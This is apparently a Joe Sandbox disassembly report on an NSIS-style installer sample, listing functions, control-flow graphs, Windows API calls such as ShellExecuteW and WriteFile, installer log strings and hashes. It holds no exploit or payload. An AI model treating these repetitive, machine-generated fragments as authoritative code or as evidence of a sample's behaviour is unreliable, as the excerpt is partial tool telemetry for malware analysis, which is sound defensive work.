                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00425976,00403792,00000000), ref: 004034FF
                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                        • String ID: (]C$... %d%%$pAB$vYB
                                                                                                                                        • API String ID: 651206458-4057001449
                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                        Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00425976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425976,74DF23A0,00000000), ref: 00406902
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GlobalFree.KERNEL32(008CAFB8), ref: 00402387
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                        • String ID: Exch: stack < %d elements$ObservationBracelets$Pop: stack empty
                                                                                                                                        • API String ID: 1459762280-3625552014
                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                        • String ID: <RM>$ObservationBracelets$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                        • API String ID: 247603264-1860994982
                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                        Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                        • String ID: nsa
                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                        • String ID: HideWindow
                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                        Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
